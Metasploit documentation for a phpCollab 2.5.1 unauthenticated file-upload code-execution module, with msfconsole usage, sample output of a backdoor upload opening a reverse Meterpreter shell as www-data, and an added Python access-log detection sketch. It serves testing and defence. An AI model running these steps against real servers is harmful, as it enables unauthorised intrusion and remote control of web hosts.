GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/unix/webapp/phpcollab_upload_exec.md

Vulnerable Application

This module exploits a file upload vulnerability in phpCollab 2.5.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user.

The exploit has been tested on Ubuntu 16.04.3 64-bit.

Vulnerable Application Installation

You can download the vulnerable application from the exploit-db page.

Follow the install instructions from the phpCollab website: http://phpcollab.com/documentation/install.htm.

The phpCollab application is only compatible with PHP 5.

Verification Steps

```
msf > use exploit/unix/webapp/phpcollab_upload_exec
msf exploit(phpcollab_upload_exec) > set RHOST [IP Address]
msf exploit(phpcollab_upload_exec) > set TARGETURI [Installation Directory]
msf exploit(phpcollab_upload_exec) > exploit
```

## Scenarios

```
[*] Started reverse TCP handler on 192.168.246.129:4444
[*] Uploading backdoor file: 1.mEgUkeNnxP.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 192.168.246.144
[*] Meterpreter session 1 opened (192.168.246.129:4444 -> 192.168.246.144:49264) at 2017-12-20 15:44:36 -0500
[+] Deleted 1.mEgUkeNnxP.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www/html/phpcollab/logos_clients
meterpreter >
```
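The session output above shows the uploaded file landing in `logos_clients` and being deleted once the session opens, so a later file-system sweep can miss it while the web server's access log still records the request. The following detection sketch is an added example, not part of the module documentation: it flags script requests under that directory in a combined-format access log. The function name, extension list and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions commonly mapped to the PHP handler (assumption; align with your server config).
SCRIPT_EXT = (".php", ".php5", ".phtml", ".phar")
UPLOAD_DIR = "/logos_clients/"  # directory shown in the session output on this page

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '192.168.246.129 - - [20/Dec/2017:15:44:35 -0500] "GET /phpcollab/logos_clients/1.png HTTP/1.1" 200 5120 "-" "-"',
    '192.168.246.129 - - [20/Dec/2017:15:44:36 -0500] "GET /phpcollab/logos_clients/1.mEgUkeNnxP.php HTTP/1.1" 200 0 "-" "-"',
    '192.168.246.1 - - [20/Dec/2017:15:45:00 -0500] "GET /phpcollab/index.php HTTP/1.1" 200 2048 "-" "-"',
    '192.168.246.1 - - [20/Dec/2017:15:46:10 -0500] "GET /phpcollab/logos_clients/2.PHP%35?x=1 HTTP/1.1" 404 196 "-" "-"',
]

def find_script_hits(lines):
    """Return (ip, timestamp, path, status) for script requests under UPLOAD_DIR."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode percent-encoding, and normalise case.
        path = unquote(urlsplit(m["target"]).path).lower()
        if UPLOAD_DIR not in path:
            continue
        name = path.rsplit("/", 1)[-1]
        # Match the extension anywhere in the name so "x.php.jpg" is caught too.
        if any(ext + "." in name + "." for ext in SCRIPT_EXT):
            hits.append((m["ip"], m["ts"], path, int(m["status"])))
    return hits

if __name__ == "__main__":
    for hit in find_script_hits(SAMPLE_LOG):
        print(hit)
```

A logo directory should only ever serve images, so any hit deserves review regardless of status code; a 200 means the script was actually served by the PHP handler.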